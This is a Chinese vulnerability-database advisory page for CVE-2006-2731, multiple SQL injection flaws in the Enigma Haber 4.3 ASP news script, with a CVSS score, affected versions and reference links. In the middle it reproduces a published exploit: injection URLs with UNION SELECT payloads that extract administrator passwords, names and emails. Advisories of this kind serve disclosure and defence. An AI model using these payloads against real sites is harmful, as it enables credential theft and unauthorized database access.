CVE-2006-2731
CVSS7.5
发布时间 :2006-06-01 06:02:00
修订时间 :2013-07-23 02:31:21
NMCOE    

[原文]Multiple SQL injection vulnerabilities in Enigma Haber 4.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in (a) e_mesaj_yas.asp, (b) edi_haber.asp, and (c) haber_devam.asp; (2) hid parameter in (d) yazdir.asp and (e) yorum.asp, and the (3) e parameter in (f) arsiv.asp. NOTE: with administrator credentials, additional vectors exist including (4) yid parameter to (g) admin/y_admin.asp, (5) bid parameter to (h) admin/reklam_detay.asp, hid parameter to (i) admin/detay_yorum.asp and (j) admin/haber_sil.asp, (6) kid parameter to (k) admin/kategori_d.asp, (7) tur parameter to (l) admin/haber_ekle.asp, (8) s parameter to (m) admin/e_mesaj_yaz.asp, and id parameter to (n) admin/admin_sil.asp.


[CNNVD]Enigma Haber 多个SQL注入漏洞(CNNVD-200606-029)

        Enigma Haber 存在多个SQL注入漏洞,远程攻击者可通过在(a)e_mesaj_yas.asp,(b)edi_haber.asp和(c)haber_devam.asp中的(1)id参数;在(d)yazdir.asp和(e)yorum.asp中(2)hid参数和在(f)arsiv.asp中的e参数来执行任意SQL命令。注意:带管理员证书,还包含其它向量:传给(g)admin/y_admin.asp的(4)yid参数,传给(h)admin/reklam_detay.asp的(5)bid参数,传给(i)admin/detay_yorum.asp和(j)admin/haber_sil.asp的hid参数,传给(k)admin/kategori_d.asp的(6)kid参数,传给(l)admin/haber_ekle.asp的(7)tur参数,传给(m)admin/e_mesaj_yaz.asp的(8)s参数,和传给(n)admin/admin_sil.asp的id参数。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:enigma_haber:enigma_haber:4.3
cpe:/a:enigma_haber:enigma_haber:4.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2731
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2731
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-029
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2032
(UNKNOWN)  VUPEN  ADV-2006-2032
http://www.securityfocus.com/bid/18148
(UNKNOWN)  BID  18148
http://www.securityfocus.com/archive/1/archive/1/435282/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060528 Advisory: Enigma Haber <= 4.3 Multiple Remote SQL InjectionVulnerabilities
http://www.osvdb.org/26119
(UNKNOWN)  OSVDB  26119
http://www.osvdb.org/26118
(UNKNOWN)  OSVDB  26118
http://www.osvdb.org/26117
(UNKNOWN)  OSVDB  26117
http://www.osvdb.org/26116
(UNKNOWN)  OSVDB  26116
http://www.osvdb.org/26115
(UNKNOWN)  OSVDB  26115
http://www.osvdb.org/26114
(UNKNOWN)  OSVDB  26114
http://www.osvdb.org/26113
(UNKNOWN)  OSVDB  26113
http://www.osvdb.org/26112
(UNKNOWN)  OSVDB  26112
http://www.osvdb.org/26111
(UNKNOWN)  OSVDB  26111
http://www.osvdb.org/26110
(UNKNOWN)  OSVDB  26110
http://www.osvdb.org/26109
(UNKNOWN)  OSVDB  26109
http://www.osvdb.org/26108
(UNKNOWN)  OSVDB  26108
http://www.osvdb.org/26107
(UNKNOWN)  OSVDB  26107
http://www.osvdb.org/26106
(UNKNOWN)  OSVDB  26106
http://www.nukedx.com/?viewdoc=34
(UNKNOWN)  MISC  http://www.nukedx.com/?viewdoc=34
http://www.nukedx.com/?getxpl=34
(UNKNOWN)  MISC  http://www.nukedx.com/?getxpl=34
http://securitytracker.com/id?1016171
(UNKNOWN)  SECTRACK  1016171
http://secunia.com/advisories/20357
(VENDOR_ADVISORY)  SECUNIA  20357
http://xforce.iss.net/xforce/xfdb/26837
(UNKNOWN)  XF  enigmahaber-multiple-sql-injection(26837)
http://securityreason.com/securityalert/1003
(UNKNOWN)  SREASON  1003

- 漏洞信息

Enigma Haber 多个SQL注入漏洞
高危 SQL注入
2006-06-01 00:00:00 2006-06-01 00:00:00
远程  
        Enigma Haber 存在多个SQL注入漏洞,远程攻击者可通过在(a)e_mesaj_yas.asp,(b)edi_haber.asp和(c)haber_devam.asp中的(1)id参数;在(d)yazdir.asp和(e)yorum.asp中(2)hid参数和在(f)arsiv.asp中的e参数来执行任意SQL命令。注意:带管理员证书,还包含其它向量:传给(g)admin/y_admin.asp的(4)yid参数,传给(h)admin/reklam_detay.asp的(5)bid参数,传给(i)admin/detay_yorum.asp和(j)admin/haber_sil.asp的hid参数,传给(k)admin/kategori_d.asp的(6)kid参数,传给(l)admin/haber_ekle.asp的(7)tur参数,传给(m)admin/e_mesaj_yaz.asp的(8)s参数,和传给(n)admin/admin_sil.asp的id参数。

- 公告与补丁

        暂无数据

- 漏洞信息 (1840)

Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities (EDBID:1840)
asp webapps
2006-05-28 Verified
0 nukedx
N/A [点击下载]
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]
		

- 漏洞信息

26106
Enigma Haber e_mesaj_yas.asp id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Enigma Haber contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the e_mesaj_yas.asp script not properly sanitizing user-supplied input to the \'id\' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-05-28 2006-05-27
2006-05-28 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站